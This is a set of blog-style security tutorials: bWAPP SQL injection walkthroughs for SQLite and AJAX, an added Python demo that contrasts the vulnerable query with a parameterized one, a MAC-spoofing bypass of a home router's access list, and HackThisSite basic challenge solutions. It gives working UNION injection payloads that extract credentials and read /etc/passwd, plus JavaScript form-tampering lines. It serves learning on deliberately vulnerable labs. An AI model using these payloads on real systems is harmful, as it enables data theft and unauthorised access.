This challenge has a very similar layout to the previous bWAPP challenge I posted; it allows users to search for movie titles. The vulnerability itself is not difficult to find. Placing an apostrophe in the search string will induce an error:

sqlite_error

The page reveals a vague “Error: HY000” message. I spent a few moments searching on Google for relevant results, but the information I came across was not very useful. I am fairly confident in exploiting SQLi vulnerabilities, so I approached this challenge as I normally would.

The first step I took was to find out how many columns existed in the table used by the query. The only problem with this error message is that it was not informative in any way: any syntax error or incorrect value I sent was going to produce the same error. Using ORDER BY helped me get one step closer to the solution.

iron' order by 300--   <-- Error: HY000
iron' order by 1--     <-- No error

I knew this was the path to exploitation and that my thoughts were on the right track. A few attempts later, I discovered that there were 6 columns.

sqlite_columns

This was the preparation I required before I could proceed to discover more information about the database, which brings us to the next topic.

Finding Database Information (tables/columns/sqlite version)

Before I started to inject this web page, I knew what kind of information I was looking for. The issue was that I was not familiar with SQLite syntax. After looking at some SQLite documentation, I gathered enough information to know how to concatenate strings, find the SQLite version, and obtain the tables and columns.

The following injections demonstrate the aforementioned concepts, thus completing the challenge.

Finding SQLite version:

'union+select+1,2,sqlite_version(),4,5,6--+-

sqlite_version

Finding database tables:

'union+select+1,2,name,4,5,6 from sqlite_master--+-

sqlite_name

This next injection will demonstrate how to retrieve the DDL statements used when creating the tables for the database. This will effectively reveal the tables and columns. The injection follows:

'union+select+1,2,sql,4,5,6 from sqlite_master--+-

sqlite_sql

The above image depicts the information needed: the login and password columns of the users table.

Extracting the login and password from the users table:

'union+select+1,2,login||":"||password,4,5,6 from users--+-

sqlite_data_extraction

SQLite uses “||” as the operator to concatenate strings together. In this case, we are joining the login and password with a colon.

Last Words

This concludes this thread. As always, I really hope that you can take something from this reading. Although SQLite is not as popular as other RDBMSs, information disclosure can still be achieved via SQL injection.

Happy hacking!

bWAPP SQL Injection (AJAX/JSON/jQuery) Challenge

Introduction

On this thread, I will be posting the solution to the SQL Injection (AJAX/JSON/jQuery) challenge that can be found on the vulnerable bWAPP virtual machine. I have decided to post the solution because I could not find one available online.

This documentation will demonstrate how to exploit SQL injection flaws with the involvement of web technologies such as AJAX, JSON, and jQuery. I will be using the Burp Suite to intercept the requests being sent from my web browser and modifying them to test for vulnerabilities.

Tools being used:

Description   Download
bWAPP         http://www.itsecgames.com/
Burp Suite    https://portswigger.net/burp/download.html

Getting To Know Your Target

This challenge starts off with a search feature that can pose a potential threat to the web application. As users type in the search bar, movies populate a table according to what is being searched. This challenge is distinct from other SQLi challenges because the use of AJAX and JSON provides a real-time feed of the information being requested. The images below capture this concept.

Screenshot from 2016-05-05 17:00:53

Screenshot from 2016-05-05 17:01:01

Tampering with the URL to generate an SQL syntax error will not be possible with this challenge.

nosqlierror

That being said, it is a good idea to intercept the client’s request and server’s response to get a better picture of how this application is working. Let’s see what happens when an apostrophe is inserted in the request.

Screenshot from 2016-05-05 17:05:05

A SQL syntax error is now apparent, which is a good indication of an SQLi flaw. Now that we have found our injection point, formulating a working injection that can speak to the database is the next step. When I was first attempting to solve this challenge, I tried many injections to no avail. It was obvious to me that I needed a better understanding of what the SQL code in the background was doing, which brings us to the next topic of discussion.

Analysing SQL Code For Flaws

Fortunately, we are given access to the bWAPP virtual machine. Soon I found the SQL code that was managing my requests to be the following:

$sql = "SELECT * FROM movies WHERE title LIKE '%" . sqli($title) . "%'";

Screenshot from 2016-05-05 17:07:12

I never thought that I would be tampering with the SQL LIKE statement. My mind quickly simplified this code and wrote it down to start developing a working syntax to exploit the application:

$sql = "SELECT * FROM movies WHERE title LIKE '%iron%'";

I knew that essentially the above code was the request that was being interpreted.

Finding a Working Injection Point

Now that I understood the query being used, it was time to start testing some of my suspicions.

The search feature offered by this challenge lets users search for any movie title as it automatically populates the results. For example, you can search for Iron Man or Terminator, but the results can never contain both; unless we inject an extra LIKE clause.

In theory, we can get both movies to show up with the following injection:

iron%' or title like '%term

This will make the back-end SQL code look like this:

$sql = "SELECT * FROM movies WHERE title LIKE '%iron%' or title like '%term%'";

Screenshot from 2016-05-05 17:08:21

As anticipated, the search results contained both movies.

Extracting Database Information

Now that I had a working injection, I had to figure out how many columns exist in the Movies table. This missing portion of the puzzle was discovered by looking at the server’s response:

[{"0":"2","id":"2","1":"Iron Man","title":"Iron Man","2":"2008","release_year":"2008","3":"action","genre":"action","4":"Tony Stark","main_character":"Tony Stark","5":"tt0371746","imdb":"tt0371746","6":"53","tickets_stock":"53"}]

You can see that there are 7 columns based on the data. This was my opportunity to start extracting information from the database and files from the server. This injection was very tricky because it only works in the form I will shortly demonstrate. Some injections I could only get to work by commenting out the trailing code, and others worked without commenting it out. This is strange to me, because the last clause in the request was needed to complete a true statement. I am not an SQL expert, so I can live with this mystery.

Finding database version():

iron%'+union+select+1,version(),3,4,5,6,7+and'%'='

Screenshot from 2016-05-05 17:10:03

The tables can be found with the following injection:

iron%'+union+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schema=database()--+and'%'='

The columns for the users table can be extracted with the following injection:

iron%'+union+select+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name='users'--+and'%'='

Extracting login and password from database along with /etc/passwd file:

iron%'+union+select+1,group_concat(login,0x3a,password),load_file('/etc/passwd'),4,5,6,7+from+users--+and'%'='

Screenshot from 2016-05-05 17:56:25

Last Words

The key to completing this challenge rests within figuring out a way to inject the LIKE statement. Finding the vulnerability in this challenge was not difficult, but most of my time was spent discovering a working injection.

Hopefully you have learned something from this short reading. If you have any suggestions on what topics to cover or discuss next, please let me know.

Happy hacking!
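The query pattern behind both bWAPP posts above, as an added example that is neither bWAPP's nor the author's code: it rebuilds the title search over an in-memory SQLite database with a constructed schema, runs the ORDER BY probe, the sqlite_master UNION and the second post's quote-balancing `AND '%'='` form, and puts the bound, LIKE-escaped query beside it so the same inputs become plain text.

```python
# Added example, not bWAPP's or the post author's code. It rebuilds the search
# query pattern from both bWAPP posts over an in-memory SQLite database
# (schema and rows below are constructed) and contrasts it with the bound,
# LIKE-escaped version that leaves every payload inert.
import sqlite3

# Constructed stand-in for bWAPP's tables: six columns, as the ORDER BY probe
# in the SQLite post found, plus the users table the posts read from.
SCHEMA = """
CREATE TABLE movies (id INTEGER, title TEXT, release_year TEXT, genre TEXT,
                     main_character TEXT, imdb TEXT);
CREATE TABLE users (login TEXT, password TEXT);
INSERT INTO movies VALUES (1, 'Iron Man', '2008', 'action', 'Tony Stark', 'tt0371746');
INSERT INTO movies VALUES (2, 'The Terminator', '1984', 'sci-fi', 'T-800', 'tt0088247');
INSERT INTO users VALUES ('alice', 'constructed-password-hash');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn, term):
    # The pattern both posts exploit: the search term is spliced into the SQL.
    sql = "SELECT * FROM movies WHERE title LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    # Hardened form: the term is bound as a value, and LIKE's own wildcards are
    # escaped so a '%' or '_' typed by the user matches literally.
    escaped = (term.replace("\\", "\\\\")
                   .replace("%", "\\%")
                   .replace("_", "\\_"))
    sql = "SELECT * FROM movies WHERE title LIKE ? ESCAPE '\\'"
    return conn.execute(sql, ("%" + escaped + "%",)).fetchall()


def column_count(conn):
    # ORDER BY probe from the SQLite post: the first index that errors is one
    # past the number of columns, which the UNION below has to match.
    n = 1
    while True:
        try:
            search_vulnerable(conn, f"' ORDER BY {n}-- -")
        except sqlite3.OperationalError:
            return n - 1
        n += 1


def dump_schema(conn):
    # UNION against sqlite_master with the DDL in the third column; the
    # trailing comment swallows the query's own closing "%'".
    rows = search_vulnerable(conn, "' UNION SELECT 1,2,sql,4,5,6 FROM sqlite_master-- -")
    return [r[2] for r in rows if isinstance(r[2], str) and r[2].startswith("CREATE")]


def version_via_balanced_union(conn):
    # The second post's alternative to a comment: end with  AND '%'='  so the
    # query's own closing  %'  completes a true comparison in the last column.
    rows = search_vulnerable(
        conn, "iron%' UNION SELECT 1,sqlite_version(),3,4,5,6 AND '%'='")
    return sqlite3.sqlite_version in [r[1] for r in rows]


if __name__ == "__main__":
    db = open_db()
    print("columns:", column_count(db))
    print("schema:", dump_schema(db))
    print("version leaked:", version_via_balanced_union(db))
    # Same payload through the bound query: a plain string, no matching titles.
    print("safe:", search_safe(db, "' UNION SELECT 1,2,sql,4,5,6 FROM sqlite_master-- -"))
```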

Bypassing Router’s Access Control List (ACL)

Introduction

Today I will be discussing a very simple way to get around Access Control Lists using Ubuntu, although it is also possible through Windows. ACLs can be used to enforce network security by limiting which portions of your network devices can access, or even by limiting access to the internet. They are put in place to seclude hosts from certain parts of your enterprise or from private infrastructure.

Modern home routers (or modem/router combos) include a basic Access Control feature to prevent users from accessing the web. Depending on the router, times and dates can be configured to prevent devices from using the internet.

The following sections will cover:

  • Understanding The Router’s ACL Logic
  • Enabling ACL On The Router
  • Changing Interface MAC Address
  • Conclusion

Understanding The Router’s ACL Logic

Before we continue in discussing how to bypass ACLs on your home network, it is important to understand how the technologies in play function. This will provide us with more insight to why what we are doing works.

An Access Control List blocks devices based on their IP address. Routers are considered layer 3 devices, meaning that they handle IP packets and pass them down to other layers for processing through encapsulation. Your home router keeps an ARP table that associates every IP address with its corresponding MAC address. When a request is made from a device that has been blocked, the router inspects the packets and analyses the source IP address. If the source IP address matches an entry in its ACL, the traffic is blocked.

When a new device joins the network and its MAC address is not associated with any IP address, the machine is given an unused IP address. That is to say, changing your MAC address will cause DHCP to provide your interface with a new IP address, circumventing the applied restrictions.

Enabling ACL On The Router

Many routers have unique builds. Enabling Access Controls may differ from router to router, but the concept behind them is similar. The device that will be blocked for demonstration purposes has the IP address 192.168.0.16.

Enabling Access Control

Once this restriction is put in place, browsing the web will not be possible:

ACL in effect

ACL in effect

Changing Interface MAC Address

Changing your interface’s MAC address is very simple. I will be using a utility called MacChanger to spoof my MAC address. Please keep in mind that you can use built-in tools such as ‘ip’ and ‘ifconfig’ to change your MAC address. In Windows, you will need to change your adapter’s configuration. The changes that you make to your burned-in address will not persist across reboots.

It is always good practice to take note of your current MAC address in case it is needed later. The following steps will guide you through installing MacChanger, obtaining your interface’s MAC address, bringing your interface down, changing your MAC address, then bringing your interface up to obtain a new IP address.

You can install MacChanger with the given command below:

sudo apt-get install macchanger

The following image displays our interface’s status (UP), IP address, and MAC address:

ifconfig wlan0
macchanger --show wlan0
ip a | grep wlan0

interface details

You will need to bring your interface down before you can proceed in acquiring a new MAC address.

ifconfig wlan0 down

After that is done, we can continue. I will be changing my MAC from “74:e5:43:30:78:a7” to “74:e5:43:30:78:a1”:

macchanger -m 74:e5:43:30:78:a1
ifconfig wlan0
ifconfig wlan0 up

Changing MAC address

It is important to keep in mind that bringing your interface UP while it still has the old IP address with the new MAC address will cause a conflict in your home network, and in turn you will be disconnected from the access point. Make sure that you disable and re-enable your wireless after bringing your interface UP. This allows the router to provide an unused IP address for the new MAC address when you re-authenticate to your wireless access point.

At this time, the new IP address is 192.168.0.14. We can confirm that the ACL in place for our device has been evaded:

ACL bypassed

Conclusion

Overall, understanding the conventions that rule your devices can be a powerful instrument. To recapitulate, bypassing your home router’s ACL can be accomplished by changing your MAC address in order to obtain a new IP address.

Hopefully everyone was able to take something with them after reading. If you would like any type of topic to be covered, do not hesitate to ask.

Happy hacking!

HackThisSite Basic Challenges 1-5

Introduction

In this post I will be documenting most of the Basic Challenges found on HackThisSite.org. Completing these challenges will give you a very basic overview of HTML and Javascript Injection. The rest of the challenges will be documented in another post.

Basic – Level 1

Description: This level is what we call "The Idiot Test", if you can't complete it, don't give up on learning all you can, but, don't go begging to someone else for the answer, that's one way to get you hated/made fun of. Enter the password and you can continue.

The purpose of the first challenge is to test your HTML knowledge. Although nothing appears to be visible on the page, the password is left in a comment in the page source. Inspecting the source is how this challenge will be solved.

<!-- the first few levels are extremely easy: password is 488918f4 -->


Basic – Level 2

Description: Network Security Sam set up a password protection script. He made it load the real password from an unencrypted text file and compare it to the password the user enters. However, he neglected to upload the password file...

This challenge will force you to comprehend the scenario that is being presented. Because Sam forgot to upload the password file, the password is going to be blank.

Basic – Level 3

Description: This time Network Security Sam remembered to upload the password file, but there were deeper problems than that.

This challenge will once again test your knowledge of basic HTML. Every form in HTML is enclosed within <form> tags. Inspecting the source code of this form will provide an attacker with more insight:

<form action="/missions/basic/3/index.php" method="post">
<input type="hidden" name="file" value="password.php" />
<input type="password" name="password" />
<input type="submit" value="submit" /></form>

The action tells the form where to go once it is submitted. The method is how this information will be transmitted: $_POST suggests that the information will be sent to the server for interpretation, and $_GET suggests that information will be obtained from the server. In this case we will be sending the password.

It is important to understand how forms are made in HTML to complete this challenge. <input> tags tell the form whether a field is going to be a text box, a radio button, a text area, etc. This is denoted by the type attribute. The values can be “text” for text boxes, “password” for input to be obfuscated, and “hidden” for the field to be hidden. The name attribute gives that input a unique name; this is useful when using the DOM, because it knows how to access those specific fields by their given name. This becomes useful when utilizing Javascript injection (more about this ahead). The value is simply the content that shows up in that field.

The page for this challenge only shows ONE text box, but as you can see there are TWO in the source. You can change the type value to “text” to reveal the hidden field.

Although this does not do much but show the extra text box, it is interesting to see the value of this field – password.php. This challenge is highly unrealistic but it tells us the file where the password is stored. Pointing your browser to https://www.hackthissite.org/missions/basic/3/password.php solves this challenge.

Basic – Level 4

Description: This time Sam hardcoded the password into the script. However, the password is long and complex, and Sam is often forgetful. So he wrote a script that would email his password to him automatically in case he forgot. Here is the script

I found this challenge interesting because it can be completed in more than one way. One way is by using your knowledge of HTML, which is the easier of the two, and the other is by using your knowledge of Javascript, using Javascript injection to modify form values. Let's take a look at both methods. The first method covers HTML.

Method One – Editing HTML.

Let's begin by taking a look at how the form is set up in the source code:

<form action="/missions/basic/4/level4.php" method="post">
<input type="hidden" name="to" value="sam@hackthissite.org" />
<input type="submit" value="Send password to Sam" />
</form>

<b>Password:</b>
<form action="/missions/basic/4/index.php" method="post">
<input type="password" name="password" />
<input type="submit" value="submit" />
</form>

This method is very similar to challenge 3, where there is a hidden field in the source. If you pay attention to the second line of the source code above, you will notice that the password is being sent to sam@hackthissite.org. This is the value that we need to edit. Changing the input type to “text” causes the field to appear on the page, allowing you to edit the email and submit the form, concluding this challenge.

Method two – Javascript Injection.

The last method to solve this challenge is by editing the form, tampering with its elements through Javascript. Let's revisit our source code:

<form action="/missions/basic/4/level4.php" method="post">
<input type="hidden" name="to" value="sam@hackthissite.org" />
<input type="submit" value="Send password to Sam" />
</form>

<b>Password:</b>
<form action="/missions/basic/4/index.php" method="post">
<input type="password" name="password" />
<input type="submit" value="submit" />
</form>

In order to pull this attack off, it is necessary to understand how Javascript handles forms. Every form on the page is contained in an array called forms[x], where x is the index of the form on the page, starting from zero. This is important for this challenge because the value that we want to edit is in the first form, therefore our injection will use forms[0]. Changing the value sam@hackthissite.org can be accomplished in two ways. The first is accessing the input by its name and inserting our own value, and the second is modifying the element that corresponds to that value and inserting our own.

Let's take a closer look at our code:

<input type="hidden" name="to" value="sam@hackthissite.org" />

If we wanted to get the value of this field, our injection becomes:

javascript:alert(document.forms[0].to.value);

Everything in this injection is derived from the code supplied in the source. forms[0] is used because it's the first form, and “to.value” is used because to is the field’s name. Entering the above injection in the URL will display “sam@hackthissite.org”.

At this point we can specify the value for this field with:

javascript:alert(document.forms[0].to.value="yourEmail@gmail.com");

In order to pass this challenge, you need to send the password to the email you registered on HTS.

The last method to finish this challenge is by modifying the element that corresponds to that value and editing it. To accomplish this, we first need to understand what elements are in Javascript. An HTML element is a single component of a form. These components represent a value within the form; they can represent values throughout the entire markup. Take a look at the source code below provided by the challenge:

<input type="hidden" name="to" value="sam@hackthissite.org" />
<input type="submit" value="Send password to Sam" />

There are two values for the input tags: the first value is the email, sam@hackthissite.org, and the second value is “Send password to Sam”. We can use their elements to change their values. We will grab the first available element and see its value. This can be done with:

javascript:alert(document.forms[0].elements[0].value)

The page will display an alert box that says “sam@hackthissite.org”. If we change the element index to 1:

javascript:alert(document.forms[0].elements[1].value)

The page will display an alert box that says “Send password to Sam”. From here you can change the value of the email using its element to complete the challenge:

javascript:alert(document.forms[0].elements[0].value="yourEmail@gmail.com")

Concluding the challenge in two different ways.

Basic – Level 5

Description: Sam has gotten wise to all the people who wrote their own forms to get the password. Rather than actually learn the password, he decided to make his email program a little more secure.

This challenge is very similar to the previous one. I was not sure whether there was supposed to be a difference; however, I completed it the same way as challenge 4.

javascript:alert(document.forms[0].to.value="yourEmail@gmail.com")

I will conclude the first few challenges here and document the rest in another post. This thread will be updated with a link to the next challenges.

Thank you for reading!